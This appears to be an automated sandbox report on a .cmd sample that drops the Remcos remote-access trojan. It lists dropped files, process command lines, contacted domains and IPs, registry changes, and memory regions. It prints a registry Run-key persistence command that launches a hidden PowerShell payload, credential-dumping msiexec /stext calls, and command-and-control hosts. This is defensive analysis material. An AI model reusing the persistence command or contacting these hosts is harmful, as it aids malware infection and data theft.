Files
File Path | Type | Category | Malicious
---|---|---|---
rIMG465244247443GULFORDEROpmagasinering.cmd | ASCII text, with very long lines (6138), with no line terminators | initial sample |
C:\ProgramData\remcos\logs.dat | data | dropped |
C:\Users\user\AppData\Local\Temp\biljl.vbs | data | dropped |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json | JSON data | dropped |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | data | modified |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nhrkykzt.iy5.psm1 | ASCII text, with no line terminators | dropped |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pf2hhutw.l1c.ps1 | ASCII text, with no line terminators | dropped |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vd4vqodm.w5c.ps1 | ASCII text, with no line terminators | dropped |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z32uhnbf.ph5.psm1 | ASCII text, with no line terminators | dropped |
C:\Users\user\AppData\Local\Temp\bhvF678.tmp | Extensible storage engine DataBase, version 0x620, checksum 0x57c24073, page size 32768, DirtyShutdown, Windows version 10.0 | dropped |
C:\Users\user\AppData\Local\Temp\pvaqv | Unicode text, UTF-16, little-endian text, with no line terminators | dropped |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy) | data | dropped |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y9CC0PCII26P6XS9DIN2.temp | data | dropped |
C:\Users\user\AppData\Roaming\Rafting.Ans | ASCII text, with very long lines (65536), with no line terminators | dropped |
Processes
Path | Cmdline | Malicious
---|---|---
C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rIMG465244247443GULFORDEROpmagasinering.cmd" " |
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | |
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | |
C:\Windows\SysWOW64\msiexec.exe | "C:\Windows\SysWOW64\msiexec.exe" |
C:\Windows\SysWOW64\msiexec.exe | C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pvaqv" |
C:\Windows\SysWOW64\msiexec.exe | C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sxfiolkk" |
C:\Windows\SysWOW64\msiexec.exe | C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\crtbpevmxvde" |
C:\Windows\SysWOW64\wscript.exe | "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" |
C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)" |
C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
C:\Windows\SysWOW64\reg.exe | REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)" |
URLs
Domains
Name | IP | Malicious
---|---|---
pelele.duckdns.org | 185.236.203.101 |
plieltd.top | 172.67.155.139 |
geoplugin.net | 178.237.33.50 |
IPs
IP | Domain | Country | Malicious
---|---|---|---
185.236.203.101 | pelele.duckdns.org | Romania |
172.67.155.139 | plieltd.top | United States |
178.237.33.50 | geoplugin.net | Netherlands |
Registry
Path | Value | Malicious
---|---|---
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing |
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableAutoFileTracing |
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing |
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask |
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask |
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize |
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory |
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing |
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableAutoFileTracing |
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableConsoleTracing |
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileTracingMask |
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | ConsoleTracingMask |
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | MaxFileSize |
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileDirectory |
HKEY_CURRENT_USER\SOFTWARE\Darksomeness | Subtropiske |
HKEY_CURRENT_USER\Environment | Assumably |
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B | exepath |
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B | licence |
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B | time |
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache | LangID |
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache | C:\Windows\System32\WScript.exe.FriendlyAppName |
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache | C:\Windows\System32\WScript.exe.ApplicationCompany |
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | Gummicheckene |
Memdumps
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
1A3F97E000
|
stack
|
page read and write
|
||
9351000
|
heap
|
page read and write
|
||
2D2E000
|
heap
|
page read and write
|
||
27093000
|
heap
|
page read and write
|
||
120EE330000
|
trusted library allocation
|
page read and write
|
||
52C0000
|
trusted library allocation
|
page read and write
|
||
1A3FC77000
|
stack
|
page read and write
|
||
490000
|
heap
|
page read and write
|
||
9351000
|
heap
|
page read and write
|
||
2F35000
|
heap
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
49AC000
|
heap
|
page read and write
|
||
E945000
|
direct allocation
|
page execute and read and write
|
||
2F0E000
|
unkown
|
page read and write
|
||
52C0000
|
trusted library allocation
|
page read and write
|
||
26B73000
|
heap
|
page read and write
|
||
83F000
|
heap
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
2F80000
|
trusted library allocation
|
page read and write
|
||
120F059B000
|
heap
|
page read and write
|
||
80B000
|
heap
|
page read and write
|
||
1208164A000
|
trusted library allocation
|
page read and write
|
||
1A3FAFE000
|
stack
|
page read and write
|
||
5483000
|
trusted library allocation
|
page read and write
|
||
7FFD9B782000
|
trusted library allocation
|
page read and write
|
||
75BD000
|
stack
|
page read and write
|
||
50C8000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
819000
|
heap
|
page read and write
|
||
49CA000
|
heap
|
page read and write
|
||
8E8D000
|
stack
|
page read and write
|
||
2960000
|
heap
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
49A1000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
812000
|
heap
|
page read and write
|
||
87C0000
|
trusted library allocation
|
page execute and read and write
|
||
4EA0000
|
trusted library allocation
|
page execute and read and write
|
||
7FB000
|
heap
|
page read and write
|
||
27093000
|
heap
|
page read and write
|
||
26F9000
|
stack
|
page read and write
|
||
7D30000
|
trusted library allocation
|
page read and write
|
||
49A0000
|
heap
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
7CAE000
|
stack
|
page read and write
|
||
12080499000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
2664D000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
49A1000
|
heap
|
page read and write
|
||
835000
|
heap
|
page read and write
|
||
49AC000
|
heap
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
79D1000
|
heap
|
page read and write
|
||
27084000
|
heap
|
page read and write
|
||
120EFC30000
|
heap
|
page execute and read and write
|
||
8E4E000
|
stack
|
page read and write
|
||
610000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
2613B000
|
heap
|
page read and write
|
||
25450000
|
heap
|
page read and write
|
||
823000
|
heap
|
page read and write
|
||
2FD9000
|
stack
|
page read and write
|
||
120F051E000
|
heap
|
page read and write
|
||
8951000
|
heap
|
page read and write
|
||
4990000
|
heap
|
page read and write
|
||
27084000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
8EC0000
|
trusted library allocation
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
DF45000
|
direct allocation
|
page execute and read and write
|
||
4DA0000
|
trusted library allocation
|
page read and write
|
||
83D000
|
heap
|
page read and write
|
||
837000
|
heap
|
page read and write
|
||
44DE000
|
stack
|
page read and write
|
||
4995000
|
heap
|
page read and write
|
||
49D3000
|
heap
|
page read and write
|
||
25309000
|
heap
|
page read and write
|
||
9359000
|
heap
|
page read and write
|
||
5018000
|
trusted library allocation
|
page read and write
|
||
4970000
|
heap
|
page read and write
|
||
1A409CF000
|
stack
|
page read and write
|
||
1208049D000
|
trusted library allocation
|
page read and write
|
||
1208048C000
|
trusted library allocation
|
page read and write
|
||
499B000
|
heap
|
page read and write
|
||
9358000
|
heap
|
page read and write
|
||
3250000
|
heap
|
page read and write
|
||
72EE000
|
stack
|
page read and write
|
||
1A3F536000
|
stack
|
page read and write
|
||
935D000
|
heap
|
page read and write
|
||
26644000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
120F0480000
|
heap
|
page execute and read and write
|
||
2734000
|
heap
|
page read and write
|
||
49A2000
|
heap
|
page read and write
|
||
120EE279000
|
heap
|
page read and write
|
||
7F7000
|
heap
|
page read and write
|
||
251F8000
|
heap
|
page read and write
|
||
120F0519000
|
heap
|
page read and write
|
||
8830000
|
trusted library allocation
|
page read and write
|
||
7D40000
|
trusted library allocation
|
page read and write
|
||
50C9000
|
heap
|
page read and write
|
||
DDE000
|
stack
|
page read and write
|
||
120F02FB000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
827000
|
heap
|
page read and write
|
||
934B000
|
heap
|
page read and write
|
||
25181000
|
heap
|
page read and write
|
||
8ED0000
|
trusted library allocation
|
page read and write
|
||
4990000
|
heap
|
page read and write
|
||
83A000
|
heap
|
page read and write
|
||
2F9C000
|
stack
|
page read and write
|
||
784E000
|
stack
|
page read and write
|
||
73EE000
|
stack
|
page read and write
|
||
2F19000
|
heap
|
page read and write
|
||
81B000
|
heap
|
page read and write
|
||
120F0310000
|
heap
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
120EFCF0000
|
heap
|
page read and write
|
||
934B000
|
heap
|
page read and write
|
||
26B75000
|
heap
|
page read and write
|
||
615000
|
heap
|
page read and write
|
||
49AC000
|
heap
|
page read and write
|
||
7D90000
|
trusted library allocation
|
page read and write
|
||
934B000
|
heap
|
page read and write
|
||
49AC000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
49A6000
|
heap
|
page read and write
|
||
120EE020000
|
heap
|
page read and write
|
||
935D000
|
heap
|
page read and write
|
||
49BE000
|
heap
|
page read and write
|
||
4E81000
|
heap
|
page read and write
|
||
12080B6D000
|
trusted library allocation
|
page read and write
|
||
499D000
|
heap
|
page read and write
|
||
26136000
|
heap
|
page read and write
|
||
8CF0000
|
trusted library allocation
|
page read and write
|
||
29CE000
|
unkown
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
827000
|
heap
|
page read and write
|
||
473000
|
system
|
page execute and read and write
|
||
49DD000
|
heap
|
page read and write
|
||
49AC000
|
heap
|
page read and write
|
||
120EFB80000
|
trusted library allocation
|
page read and write
|
||
26132000
|
heap
|
page read and write
|
||
120F05B6000
|
heap
|
page read and write
|
||
C96000
|
heap
|
page read and write
|
||
26647000
|
heap
|
page read and write
|
||
88CE000
|
stack
|
page read and write
|
||
4F22000
|
trusted library allocation
|
page read and write
|
||
57CC000
|
trusted library allocation
|
page read and write
|
||
2F3F000
|
stack
|
page read and write
|
||
935D000
|
heap
|
page read and write
|
||
7D70000
|
trusted library allocation
|
page read and write
|
||
934B000
|
heap
|
page read and write
|
||
49B3000
|
heap
|
page read and write
|
||
49B8000
|
heap
|
page read and write
|
||
49A7000
|
heap
|
page read and write
|
||
120EE350000
|
trusted library allocation
|
page read and write
|
||
2613E000
|
heap
|
page read and write
|
||
8820000
|
heap
|
page read and write
|
||
7DD0000
|
trusted library allocation
|
page read and write
|
||
7530000
|
direct allocation
|
page read and write
|
||
2D2D000
|
heap
|
page read and write
|
||
50C9000
|
heap
|
page read and write
|
||
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
2B06000
|
stack
|
page read and write
|
||
49BB000
|
heap
|
page read and write
|
||
4B4F000
|
stack
|
page read and write
|
||
822000
|
heap
|
page read and write
|
||
499B000
|
heap
|
page read and write
|
||
120EFCF5000
|
heap
|
page read and write
|
||
9355000
|
heap
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
4990000
|
heap
|
page read and write
|
||
120EE300000
|
trusted library allocation
|
page read and write
|
||
7540000
|
direct allocation
|
page read and write
|
||
4EC1000
|
trusted library allocation
|
page read and write
|
||
799E000
|
stack
|
page read and write
|
||
4991000
|
heap
|
page read and write
|
||
2F35000
|
heap
|
page read and write
|
||
4911000
|
heap
|
page read and write
|
||
120F0272000
|
heap
|
page read and write
|
||
8840000
|
heap
|
page read and write
|
||
49AC000
|
heap
|
page read and write
|
||
4D84000
|
trusted library allocation
|
page read and write
|
||
7295000
|
heap
|
page execute and read and write
|
||
82E000
|
heap
|
page read and write
|
||
36F0000
|
heap
|
page read and write
|
||
55D8000
|
trusted library allocation
|
page read and write
|
||
934B000
|
heap
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
2770000
|
heap
|
page read and write
|
||
81C000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
9355000
|
heap
|
page read and write
|
||
120F0490000
|
heap
|
page read and write
|
||
4999000
|
heap
|
page read and write
|
||
120EE25A000
|
heap
|
page read and write
|
||
50C8000
|
heap
|
page read and write
|
||
4D40000
|
heap
|
page read and write
|
||
120F0104000
|
heap
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
25C37000
|
heap
|
page read and write
|
||
3258000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
4E81000
|
heap
|
page read and write
|
||
4DB5000
|
trusted library allocation
|
page execute and read and write
|
||
4990000
|
heap
|
page read and write
|
||
2FD0000
|
heap
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
811000
|
heap
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
935D000
|
heap
|
page read and write
|
||
25181000
|
heap
|
page read and write
|
||
27084000
|
heap
|
page read and write
|
||
7CEE000
|
stack
|
page read and write
|
||
4A19000
|
heap
|
page read and write
|
||
7AE9000
|
heap
|
page read and write
|
||
120EE340000
|
heap
|
page readonly
|
||
890000
|
heap
|
page read and write
|
||
2BED000
|
heap
|
page read and write
|
||
2543F000
|
heap
|
page read and write
|
||
7E5000
|
heap
|
page read and write
|
||
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
251F8000
|
heap
|
page read and write
|
||
2BA0000
|
heap
|
page readonly
|
||
49A6000
|
heap
|
page read and write
|
||
1A40B4B000
|
stack
|
page read and write
|
||
253FC000
|
heap
|
page read and write
|
||
820000
|
heap
|
page read and write
|
||
678000
|
heap
|
page read and write
|
||
49BB000
|
heap
|
page read and write
|
||
8810000
|
trusted library allocation
|
page execute and read and write
|
||
83A000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
120F0487000
|
heap
|
page execute and read and write
|
||
830000
|
heap
|
page read and write
|
||
934E000
|
heap
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
12081F79000
|
trusted library allocation
|
page read and write
|
||
27093000
|
heap
|
page read and write
|
||
77CE000
|
stack
|
page read and write
|
||
12080BA0000
|
trusted library allocation
|
page read and write
|
||
58E000
|
stack
|
page read and write
|
||
1A3F87E000
|
stack
|
page read and write
|
||
935D000
|
heap
|
page read and write
|
||
2B90000
|
heap
|
page read and write
|
||
25D5000
|
stack
|
page read and write
|
||
49BB000
|
heap
|
page read and write
|
||
57B0000
|
trusted library allocation
|
page read and write
|
||
12081D93000
|
trusted library allocation
|
page read and write
|
||
2D2E000
|
heap
|
page read and write
|
||
12080BBB000
|
trusted library allocation
|
page read and write
|
||
25291000
|
heap
|
page read and write
|
||
2B2E000
|
heap
|
page read and write
|
||
27FE000
|
unkown
|
page read and write
|
||
92F3000
|
heap
|
page read and write
|
||
12081DA1000
|
trusted library allocation
|
page read and write
|
||
8B90000
|
trusted library allocation
|
page read and write
|
||
7E8000
|
heap
|
page read and write
|
||
834000
|
heap
|
page read and write
|
||
4D80000
|
trusted library allocation
|
page read and write
|
||
49A6000
|
heap
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
81E000
|
heap
|
page read and write
|
||
934D000
|
heap
|
page read and write
|
||
825000
|
heap
|
page read and write
|
||
9351000
|
heap
|
page read and write
|
||
4A4E000
|
stack
|
page read and write
|
||
120F0544000
|
heap
|
page read and write
|
||
2F1B000
|
heap
|
page read and write
|
||
120EE100000
|
heap
|
page read and write
|
||
9945000
|
direct allocation
|
page execute and read and write
|
||
4E1E000
|
stack
|
page read and write
|
||
C145000
|
direct allocation
|
page execute and read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
24BB0000
|
remote allocation
|
page read and write
|
||
49A2000
|
heap
|
page read and write
|
||
25C33000
|
heap
|
page read and write
|
||
C90000
|
heap
|
page read and write
|
||
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
4A19000
|
heap
|
page read and write
|
||
32B0000
|
heap
|
page read and write
|
||
25C39000
|
heap
|
page read and write
|
||
7D50000
|
trusted library allocation
|
page read and write
|
||
8E0C000
|
stack
|
page read and write
|
||
9359000
|
heap
|
page read and write
|
||
2F1B000
|
heap
|
page read and write
|
||
120EE284000
|
heap
|
page read and write
|
||
2FDA000
|
heap
|
page read and write
|
||
2664C000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
49A5000
|
heap
|
page read and write
|
||
351E000
|
stack
|
page read and write
|
||
4E60000
|
heap
|
page readonly
|
||
540000
|
heap
|
page read and write
|
||
4DAA000
|
trusted library allocation
|
page execute and read and write
|
||
2520B000
|
heap
|
page read and write
|
||
9300000
|
heap
|
page read and write
|
||
8900000
|
trusted library allocation
|
page read and write
|
||
34DD000
|
stack
|
page read and write
|
||
7F7000
|
heap
|
page read and write
|
||
5725000
|
trusted library allocation
|
page read and write
|
||
12081D81000
|
trusted library allocation
|
page read and write
|
||
4D70000
|
trusted library allocation
|
page read and write
|
||
2857000
|
heap
|
page read and write
|
||
817000
|
heap
|
page read and write
|
||
2521A000
|
heap
|
page read and write
|
||
2F1B000
|
heap
|
page read and write
|
||
58AA000
|
trusted library allocation
|
page read and write
|
||
2873000
|
heap
|
page read and write
|
||
81F000
|
heap
|
page read and write
|
||
2F17000
|
heap
|
page read and write
|
||
2543B000
|
heap
|
page read and write
|
||
2FFA000
|
heap
|
page read and write
|
||
8D7B000
|
stack
|
page read and write
|
||
120F00F0000
|
heap
|
page execute and read and write
|
||
50C3000
|
heap
|
page read and write
|
||
2BE0000
|
heap
|
page read and write
|
||
25225000
|
heap
|
page read and write
|
||
2F1A000
|
heap
|
page read and write
|
||
4911000
|
heap
|
page read and write
|
||
259C000
|
stack
|
page read and write
|
||
120902E9000
|
trusted library allocation
|
page read and write
|
||
4DD0000
|
trusted library allocation
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
4EB0000
|
heap
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
2AFD000
|
stack
|
page read and write
|
||
7AC0000
|
trusted library allocation
|
page read and write
|
||
26B70000
|
heap
|
page read and write
|
||
4E5E000
|
stack
|
page read and write
|
||
120EFCF7000
|
heap
|
page read and write
|
||
8B8D000
|
stack
|
page read and write
|
||
27093000
|
heap
|
page read and write
|
||
27093000
|
heap
|
page read and write
|
||
2B0A000
|
heap
|
page read and write
|
||
7550000
|
direct allocation
|
page read and write
|
||
2F1A000
|
heap
|
page read and write
|
||
B745000
|
direct allocation
|
page execute and read and write
|
||
48F000
|
stack
|
page read and write
|
||
3305000
|
heap
|
page read and write
|
||
1A40ACA000
|
stack
|
page read and write
|
||
2B94000
|
heap
|
page read and write
|
||
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
1A3F9FB000
|
stack
|
page read and write
|
||
4A1D000
|
heap
|
page read and write
|
||
25560000
|
heap
|
page read and write
|
||
791E000
|
stack
|
page read and write
|
||
1A3F5BE000
|
stack
|
page read and write
|
||
120F027A000
|
heap
|
page read and write
|
||
5EC1000
|
trusted library allocation
|
page read and write
|
||
8955000
|
heap
|
page read and write
|
||
7520000
|
direct allocation
|
page read and write
|
||
813000
|
heap
|
page read and write
|
||
8EA0000
|
trusted library allocation
|
page read and write
|
||
12081DA5000
|
trusted library allocation
|
page read and write
|
||
6053000
|
trusted library allocation
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
456000
|
system
|
page execute and read and write
|
||
842000
|
heap
|
page read and write
|
||
7F7000
|
heap
|
page read and write
|
||
459000
|
system
|
page execute and read and write
|
||
7280000
|
trusted library allocation
|
page read and write
|
||
25455000
|
heap
|
page read and write
|
||
25450000
|
heap
|
page read and write
|
||
7AE0000
|
heap
|
page read and write
|
||
49A1000
|
heap
|
page read and write
|
||
4D20000
|
heap
|
page read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
355F000
|
stack
|
page read and write
|
||
8EB0000
|
trusted library allocation
|
page read and write
|
||
49DE000
|
stack
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
8F10000
|
direct allocation
|
page read and write
|
||
120EE1C0000
|
heap
|
page read and write
|
||
E00000
|
heap
|
page read and write
|
||
50C9000
|
heap
|
page read and write
|
||
26132000
|
heap
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
12081DB7000
|
trusted library allocation
|
page read and write
|
||
49AC000
|
heap
|
page read and write
|
||
36FB000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
813000
|
heap
|
page read and write
|
||
581F000
|
trusted library allocation
|
page read and write
|
||
120EE280000
|
heap
|
page read and write
|
||
120F04C9000
|
heap
|
page read and write
|
||
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
567E000
|
trusted library allocation
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
120EFB50000
|
trusted library allocation
|
page read and write
|
||
50C1000
|
heap
|
page read and write
|
||
2B93000
|
heap
|
page read and write
|
||
2E3F000
|
unkown
|
page read and write
|
||
2549D000
|
heap
|
page read and write
|
||
120F02B9000
|
heap
|
page read and write
|
||
49A0000
|
heap
|
page read and write
|
||
9351000
|
heap
|
page read and write
|
||
253FC000
|
heap
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
50C8000
|
heap
|
page read and write
|
||
9354000
|
heap
|
page read and write
|
||
5F27000
|
trusted library allocation
|
page read and write
|
||
588E000
|
trusted library allocation
|
page read and write
|
||
828000
|
heap
|
page read and write
|
||
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
88F0000
|
heap
|
page read and write
|
||
5DE000
|
stack
|
page read and write
|
||
32AE000
|
stack
|
page read and write
|
||
120EFC90000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
5EE9000
|
trusted library allocation
|
page read and write
|
||
4999000
|
heap
|
page read and write
|
||
935D000
|
heap
|
page read and write
|
||
897F000
|
heap
|
page read and write
|
||
4998000
|
heap
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
56D2000
|
trusted library allocation
|
page read and write
|
||
4DB0000
|
trusted library allocation
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
49A4000
|
heap
|
page read and write
|
||
7B20000
|
heap
|
page read and write
|
||
4ADF000
|
stack
|
page read and write
|
||
12090021000
|
trusted library allocation
|
page read and write
|
||
8F60000
|
trusted library allocation
|
page execute and read and write
|
||
8938000
|
heap
|
page read and write
|
||
2BB0000
|
heap
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
4FB000
|
stack
|
page read and write
|
||
2CFF000
|
unkown
|
page read and write
|
||
7AC8000
|
trusted library allocation
|
page read and write
|
||
2F1A000
|
heap
|
page read and write
|
||
32DC000
|
heap
|
page read and write
|
||
6066000
|
trusted library allocation
|
page read and write
|
||
499F000
|
stack
|
page read and write
|
||
4999000
|
heap
|
page read and write
|
||
335E000
|
heap
|
page read and write
|
||
2520B000
|
heap
|
page read and write
|
||
49A6000
|
heap
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
935D000
|
heap
|
page read and write
|
||
2F34000
|
heap
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
7FFD9B79B000
|
trusted library allocation
|
page read and write
|
||
499F000
|
heap
|
page read and write
|
||
49A9000
|
heap
|
page read and write
|
||
1A3FE7E000
|
stack
|
page read and write
|
||
1A3FCF9000
|
stack
|
page read and write
|
||
2F35000
|
heap
|
page read and write
|
||
7D2D000
|
stack
|
page read and write
|
||
8910000
|
heap
|
page read and write
|
||
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
25291000
|
heap
|
page read and write
|
||
819000
|
heap
|
page read and write
|
||
9CF000
|
stack
|
page read and write
|
||
252CC000
|
heap
|
page read and write
|
||
283A000
|
heap
|
page read and write
|
||
4997000
|
heap
|
page read and write
|
||
7BC6000
|
heap
|
page read and write
|
||
933E000
|
heap
|
page read and write
|
||
7D80000
|
trusted library allocation
|
page read and write
|
||
27C0000
|
heap
|
page read and write
|
||
935D000
|
heap
|
page read and write
|
||
4DB2000
|
trusted library allocation
|
page read and write
|
||
73AE000
|
stack
|
page read and write
|
||
4E78000
|
trusted library allocation
|
page read and write
|
||
2D23000
|
heap
|
page read and write
|
||
933B000
|
heap
|
page read and write
|
||
8B4E000
|
stack
|
page read and write
|
||
6F3E000
|
stack
|
page read and write
|
||
4991000
|
heap
|
page read and write
|
||
7560000
|
direct allocation
|
page read and write
|
||
4999000
|
heap
|
page read and write
|
||
1DB000
|
stack
|
page read and write
|
||
49A2000
|
heap
|
page read and write
|
||
7D8000
|
heap
|
page read and write
|
||
8F20000
|
direct allocation
|
page read and write
|
||
833000
|
heap
|
page read and write
|
||
74FB000
|
stack
|
page read and write
|
||
2790000
|
heap
|
page read and write
|
||
2730000
|
heap
|
page read and write
|
||
80F000
|
heap
|
page read and write
|
||
7E2B000
|
stack
|
page read and write
|
||
5481000
|
trusted library allocation
|
page read and write
|
||
2BEC000
|
heap
|
page read and write
|
||
6EFC000
|
stack
|
page read and write
|
||
7B57000
|
heap
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
27084000
|
heap
|
page read and write
|
||
4E90000
|
heap
|
page execute and read and write
|
||
9358000
|
heap
|
page read and write
|
||
7DF4E7490000
|
trusted library allocation
|
page execute and read and write
|
||
49FB000
|
heap
|
page read and write
|
||
4E81000
|
heap
|
page read and write
|
||
12080BAF000
|
trusted library allocation
|
page read and write
|
||
9358000
|
heap
|
page read and write
|
||
120F04AC000
|
heap
|
page read and write
|
||
7D60000
|
trusted library allocation
|
page read and write
|
||
83A000
|
heap
|
page read and write
|
||
7570000
|
direct allocation
|
page read and write
|
||
49B7000
|
heap
|
page read and write
|
||
ACF000
|
stack
|
page read and write
|
||
9359000
|
heap
|
page read and write
|
||
2830000
|
heap
|
page read and write
|
||
2AEC000
|
stack
|
page read and write
|
||
8F00000
|
